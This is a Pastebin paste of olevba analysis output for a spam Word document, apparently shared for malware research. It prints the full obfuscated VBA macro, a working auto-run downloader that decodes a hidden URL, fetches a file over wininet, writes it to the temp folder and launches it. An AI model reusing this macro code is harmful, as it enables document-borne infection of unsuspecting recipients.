dynamoo

Malicious Word macro

Apr 27th, 2015
371
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHB- spam.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: spam.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: spam.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub NORMAND(DEANDRE As Long)
  17. HARRIS
  18. End Sub
  19.  
  20. Sub autoopen()
  21. NORMAND (378)
  22. End Sub
  23. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  24. ANALYSIS:
  25. +----------+----------+---------------------------------------+
  26. | Type     | Keyword  | Description                           |
  27. +----------+----------+---------------------------------------+
  28. | AutoExec | AutoOpen | Runs when the Word document is opened |
  29. +----------+----------+---------------------------------------+
  30. -------------------------------------------------------------------------------
  31. VBA MACRO PERCY.bas
  32. in file: spam.doc - OLE stream: u'Macros/VBA/PERCY'
  33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  34.  
  35.  
  36. Public Function LUCIO(LUCIANO As Long, LINDSEY As String, SCOTTIE As String) As String
  37. LUCIANO = LUCIANO * 2
  38. LUCIO = SEYMOUR(LINDSEY, SCOTTIE)
  39.    
  40. End Function
  41.  
  42. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  43. ANALYSIS:
  44. No suspicious keyword or IOC found.
  45. -------------------------------------------------------------------------------
  46. VBA MACRO CLAY.bas
  47. in file: spam.doc - OLE stream: u'Macros/VBA/CLAY'
  48. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  49.  
  50. #If VBA7 And Win64 Then
  51. Public Declare PtrSafe Function SAMMIE Lib "wininet.dll" Alias "InternetOpenA" (ByVal EMILE As String, ByVal MONROE As Long, ByVal DOMINIQUE As String, ByVal TRISTANO As String, ByVal BOOKER As Long) As LongPtr
  52. #End If
  53. Public Function GERMAN(ByRef WILMER As String, ByRef GIOVANNI As Long) As Integer
  54.  GERMAN = Val("&H" & (BERNIE(62, WILMER, FLETCHER(GIOVANNI), 2)))
  55. End Function
  56. Public Function FLETCHER(ByRef GIOVANNI As Long) As Long
  57.  FLETCHER = (2 * GIOVANNI) - 1
  58. End Function
  59.  
  60.  
  61. Public Function SEYMOUR(HERSCHEL As String, WILMER As String) As String
  62.    
  63.     Dim NUMBERS As Integer
  64.     Dim BUFORD As Integer
  65.    
  66.    
  67.     Dim SANFORD As Long
  68.  SANFORD = 221
  69. If SANFORD > SANFORD * 4 Then End
  70.    
  71.     Dim GIOVANNI As Long
  72.     Dim BARNEY As String
  73.     For GIOVANNI = 1 To (LEOPOLDO(WILMER) / 2)
  74.         NUMBERS = GERMAN(WILMER, GIOVANNI)
  75.         BUFORD = LAVERNE(HERSCHEL, GIOVANNI)
  76.         BARNEY = BARNEY + BRANDEN(NUMBERS, BUFORD)
  77.     Next GIOVANNI
  78.    SEYMOUR = BARNEY
  79. End Function
  80.  
  81.  
  82.  
  83. Public Sub HARRIS()
  84.         Dim BERT As Double
  85.  
  86.     Dim SILAS As Double
  87. For SILAS = 67 To 68
  88. SILAS = SILAS + 99
  89. Next SILAS
  90.  
  91. FREDERIC (5.09)
  92.  
  93. End Sub
  94. Public Function MERRILL(MERLIN As String)
  95. Dim IRWIN As String
  96. IRWIN = "KIRBY"
  97. RODRICK 44 + 0.33
  98. IRWIN = IRWIN + "CRUZ"
  99. End Function
  100.  
  101.  
  102.  
  103.  
  104.  
  105.  
  106. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  107. ANALYSIS:
  108. +------------+----------------+-----------------------------------------+
  109. | Type       | Keyword        | Description                             |
  110. +------------+----------------+-----------------------------------------+
  111. | Suspicious | Lib            | May run code from a DLL                 |
  112. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  113. |            |                | may be used to obfuscate strings        |
  114. |            |                | (option --decode to see all)            |
  115. | IOC        | wininet.dll    | Executable file name                    |
  116. +------------+----------------+-----------------------------------------+
  117. -------------------------------------------------------------------------------
  118. VBA MACRO ROLANDO.bas
  119. in file: spam.doc - OLE stream: u'Macros/VBA/ROLANDO'
  120. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  121.  
  122. Public Const PARKER = "1C2420212D60133536392E2A2E412A2022"
  123. Public Const LEMUEL = "13362C2A2C2F606B737B22312A"
  124. Public Const LAVERN = "2738313D7B617D33293C372A205B202A3E2B3E6F2D3D286963756676077461293D28"
  125. Public Const JULES = "1C2F3724313A3B2B217B0120235010363F31282C01302F233633"
  126. Public Const ELISEO = "COLEMANREFUGIO5"
  127.  
  128.  
  129.  
  130. Public Function VALENTIN(WYATT As Long, ByVal MARQUIS As String) As Boolean
  131.     #If VBA7 And Win64 Then
  132.         Dim LANNY As LongPtr, EZRA As LongPtr
  133.     #Else
  134.         Dim LANNY As Long, EZRA As Long
  135.     #End If
  136.     Dim SYDNEY As Long
  137.     Dim RUBIN As String * EFREN, EMILE As String
  138.     Dim ARON As Integer, ELMO As Double
  139.     LANNY = EFRAIN
  140.     If LANNY = 0 Then
  141.         Exit Function
  142.     End If
  143.     Dim KAREEM As Boolean
  144.    
  145.     If JAMAR(EZRA, LANNY) Then
  146.     End If
  147.     If EZRA = 0 Then
  148.         ELMO = 0
  149.     Else
  150.         BORIS EZRA, RUBIN, EFREN, SYDNEY
  151.         EMILE = RUBIN
  152.           Dim GAIL As Long
  153.           GAIL = 0
  154.           GAIL = GAIL + 21
  155. If GAIL > GAIL + 44 Then End
  156.         Do While SYDNEY <> 0
  157.             BORIS EZRA, RUBIN, EFREN, SYDNEY
  158.                     EMILE = EMILE + Mid(RUBIN, 1, SYDNEY)
  159.         Loop
  160.              ELMO = LEOPOLDO(EMILE): _
  161.              ARON = EVERETTE("JOSEF")
  162.         Open MARQUIS _
  163.             For Binary Access Write _
  164.         Lock Write As #ARON
  165.         Put #ARON, , EMILE
  166.         GAIL = GAIL + 62
  167.     If GAIL < 0 Then End
  168.         Close #ARON
  169.     End If
  170.     DORIAN EZRA
  171.     DORIAN LANNY
  172.     EMILE = ""
  173.     If ELMO Then
  174.         VALENTIN = True
  175.     End If
  176. End Function
  177.  
  178. Public Function RODRICK(REINALDO As Double)
  179.  
  180. Dim LUCIO As Object
  181.  
  182.  
  183.     Dim JERROD As Long
  184. For JERROD = 17 To 21
  185. JERROD = JERROD + 33
  186. Next JERROD
  187.    
  188.  
  189. Dim WESTON  As Object
  190.  
  191.  
  192. For JERROD = 11 To 21
  193. JERROD = JERROD + 64
  194. Next JERROD
  195.    
  196.  
  197. Set WESTON = LAURENCE
  198. JERROD = JERROD + 42
  199. Dim LEWIS As Boolean
  200.  
  201. If JERROD > JERROD * 3 Then End
  202. LEWIS = HERSHEL(LUCIO, WESTON)
  203. REINALDO = REINALDO + 35
  204. End Function
  205.  
  206.  
  207. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  208. ANALYSIS:
  209. +------------+-------------+-----------------------------------------+
  210. | Type       | Keyword     | Description                             |
  211. +------------+-------------+-----------------------------------------+
  212. | Suspicious | Open        | May open a file                         |
  213. | Suspicious | Write       | May write to a file (if combined with   |
  214. |            |             | Open)                                   |
  215. | Suspicious | Put         | May write to a file (if combined with   |
  216. |            |             | Open)                                   |
  217. | Suspicious | Binary      | May read or write a binary file (if     |
  218. |            |             | combined with Open)                     |
  219. | Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
  220. |            |             | be used to obfuscate strings (option    |
  221. |            |             | --decode to see all)                    |
  222. +------------+-------------+-----------------------------------------+
  223. -------------------------------------------------------------------------------
  224. VBA MACRO CORNELIUS.bas
  225. in file: spam.doc - OLE stream: u'Macros/VBA/CORNELIUS'
  226. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  227.  
  228. Option Explicit
  229.  
  230. #If VBA7 And Win64 Then
  231. Public Declare PtrSafe Function BORIS Lib "wininet.dll" Alias "InternetReadFile" (ByVal WILFORD As LongPtr, ByVal RUBIN As String, ByVal SHELTON As Long, CARSON As Long) As Integer
  232. #End If
  233.  
  234.  
  235.  
  236. Public Const EFREN = 4800
  237. Public Const ANTWAN As String = "NIGEL"
  238. Public Const ALDEN = 1
  239. Public Const MARGARITO = &H4000000
  240.  
  241. Sub FREDERIC(SANTOS As Double)
  242.  
  243. MERRILL ("BLAIRLANDON")
  244. End Sub
  245.  
  246. Public Function BRANDEN(ByRef NUMBERS As Integer, ByRef BUFORD As Integer) As String
  247.     BRANDEN = Chr(NUMBERS Xor BUFORD)
  248. End Function
  249.  
  250.  
  251.  
  252.  
  253.  
  254. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  255. ANALYSIS:
  256. +------------+----------------+-----------------------------------------+
  257. | Type       | Keyword        | Description                             |
  258. +------------+----------------+-----------------------------------------+
  259. | Suspicious | Lib            | May run code from a DLL                 |
  260. | Suspicious | Chr            | May attempt to obfuscate specific       |
  261. |            |                | strings                                 |
  262. | Suspicious | Xor            | May attempt to obfuscate specific       |
  263. |            |                | strings                                 |
  264. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  265. |            |                | may be used to obfuscate strings        |
  266. |            |                | (option --decode to see all)            |
  267. | IOC        | wininet.dll    | Executable file name                    |
  268. +------------+----------------+-----------------------------------------+
  269. -------------------------------------------------------------------------------
  270. VBA MACRO LAMAR.bas
  271. in file: spam.doc - OLE stream: u'Macros/VBA/LAMAR'
  272. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  273.  
  274.  
  275.  
  276.  
  277. Public Const JASPER = "RUSSEL"
  278. #If VBA7 And Win64 Then
  279. Public Declare PtrSafe Function EUGENIO Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal MOHAMMED As LongPtr, ByVal SANDY As String, ByVal TRISTAN As String, ByVal BRIAN As Long, ByVal HOUSTON As Long, ByVal LINCOLN As Long) As LongPtr
  280.  
  281. #Else
  282. Public Declare Function DORIAN Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef ERROL As Long) As Long
  283. Public Declare Function SAMMIE Lib "wininet.dll" Alias "InternetOpenA" (ByVal EMILE As String, ByVal MONROE As Long, ByVal DOMINIQUE As String, ByVal TRISTANO As String, ByVal BOOKER As Long) As Long
  284. Public Declare Function BORIS Lib "wininet.dll" Alias "InternetReadFile" (ByVal WILFORD As Long, ByVal RUBIN As String, ByVal SHELTON As Long, CARSON As Long) As Integer
  285. Public Declare Function EUGENIO Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal MOHAMMED As Long, ByVal SANDY As String, ByVal TRISTAN As String, ByVal BRIAN As Long, ByVal HOUSTON As Long, ByVal LINCOLN As Long) As Long
  286. #End If
  287.  
  288.  
  289. Public Function LAVERNE(ByRef HERSCHEL As String, ByRef GIOVANNI As Long) As Integer
  290. LAVERNE = Asc(BERNIE(71, HERSCHEL, ((GIOVANNI Mod LEOPOLDO(HERSCHEL)) + 1), 1))
  291. End Function
  292. Public Function BERNIE(SAMMY As Long, ByRef JAYSON As String, ByRef NUMBERS As Integer, ByRef BUFORD As Integer) As String
  293.     BERNIE = Mid$(JAYSON, NUMBERS, BUFORD)
  294.     SAMMY = SAMMY + 31
  295. End Function
  296. #If VBA7 _
  297.     And Win64 Then
  298. Public Function EFRAIN() As LongPtr
  299.  #Else
  300. Public Function EFRAIN() As Long
  301.  
  302.  #End If
  303.  
  304.  EFRAIN = SAMMIE(ANTWAN, ALDEN, vbNullString, vbNullString, 0)
  305. End Function
  306.  
  307.  
  308.  
  309.  
  310.  
  311. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  312. ANALYSIS:
  313. +------------+----------------+-----------------------------------------+
  314. | Type       | Keyword        | Description                             |
  315. +------------+----------------+-----------------------------------------+
  316. | Suspicious | Lib            | May run code from a DLL                 |
  317. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  318. |            |                | may be used to obfuscate strings        |
  319. |            |                | (option --decode to see all)            |
  320. | IOC        | wininet.dll    | Executable file name                    |
  321. +------------+----------------+-----------------------------------------+
  322. -------------------------------------------------------------------------------
  323. VBA MACRO DEXTER.bas
  324. in file: spam.doc - OLE stream: u'Macros/VBA/DEXTER'
  325. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  326.  
  327.  
  328. Public Function LAURENCE() As Object
  329. Dim ISMAEL As String
  330. ISMAEL = SEYMOUR(ELISEO, JULES)
  331. Set LAURENCE = CreateObject(ISMAEL)
  332. End Function
  333.  
  334. Public Function LEOPOLDO(JAYSON As String) As Long
  335. LEOPOLDO = Len(JAYSON)
  336. End Function
  337.  
  338. Public Function JAMEL(ByRef LAZARO As Object, ByRef ALPHONSE As String, RANDELL As Double) As Boolean
  339.  
  340. Set MAJOR = CreateObject _
  341. (SEYMOUR _
  342. (ELISEO, PARKER))
  343. Dim DUSTY As Integer
  344. DUSTY = MAJOR.Open(LAZARO & ALPHONSE)
  345. End Function
  346.  
  347.  
  348. #If VBA7 And Win64 Then
  349.        Public Function JAMAR(ByRef GRADY As LongPtr, NOAH As LongPtr) As Boolean
  350.     #Else
  351.        Public Function JAMAR(ByRef GRADY As Long, NOAH As Long) As Boolean
  352.     #End If
  353.         Dim JACQUES As Double
  354. Dim GUADALUPE As String
  355. Dim CLARK As Long
  356.     GUADALUPE = LUCIO(893, ELISEO, LAVERN)
  357.  
  358. For JACQUES = 14 To 15
  359. JACQUES = JACQUES + 5.5
  360. Next JACQUES
  361.     GRADY = EUGENIO(NOAH, GUADALUPE, vbNullString, 0, MARGARITO, 0)
  362.     JAMAR = True
  363. End Function
  364.  
  365.  
  366. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  367. ANALYSIS:
  368. +------------+--------------+--------------------------+
  369. | Type       | Keyword      | Description              |
  370. +------------+--------------+--------------------------+
  371. | Suspicious | CreateObject | May create an OLE object |
  372. | Suspicious | Open         | May open a file          |
  373. +------------+--------------+--------------------------+
  374. -------------------------------------------------------------------------------
  375. VBA MACRO AMOS.bas
  376. in file: spam.doc - OLE stream: u'Macros/VBA/AMOS'
  377. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  378.  
  379.  
  380. #If VBA7 And Win64 Then
  381. Public Declare PtrSafe Function DORIAN Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef ERROL As LongPtr) As Long
  382. #End If
  383.  
  384. Public Function HERSHEL(ByRef LAZARO As Object, ByRef HOMER As Object) As Boolean
  385.  
  386. Dim HARRISON As Long
  387. Set LAZARO = IGNACIO(LAURENCE)
  388.  
  389. Dim ADOLFO
  390.  
  391. Dim ALPHONSE As String
  392. ALPHONSE = LUCIO(4096, ELISEO, LEMUEL)
  393.  
  394. For HARRISON = 6 To 8
  395. HARRISON = HARRISON * 55
  396. Next HARRISON
  397. ADOLFO = LAZARO & ALPHONSE
  398.  
  399. If VALENTIN(354, ADOLFO) Then
  400. End If
  401.  
  402.  
  403. HERSHEL = JAMEL(LAZARO, ALPHONSE, 213)
  404.  
  405. End Function
  406. Public Function EVERETTE(JAYSON As String) As Integer
  407.     EVERETTE = FreeFile
  408. End Function
  409.  
  410. Public Function IGNACIO(ByRef NICHOLAS As Object) As Object
  411. Set IGNACIO = NICHOLAS.GetSpecialFolder(2)
  412. End Function
  413.  
  414. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  415. ANALYSIS:
  416. +------------+-------------+-------------------------+
  417. | Type       | Keyword     | Description             |
  418. +------------+-------------+-------------------------+
  419. | Suspicious | Lib         | May run code from a DLL |
  420. | IOC        | wininet.dll | Executable file name    |
  421. +------------+-------------+-------------------------+
RAW Paste Data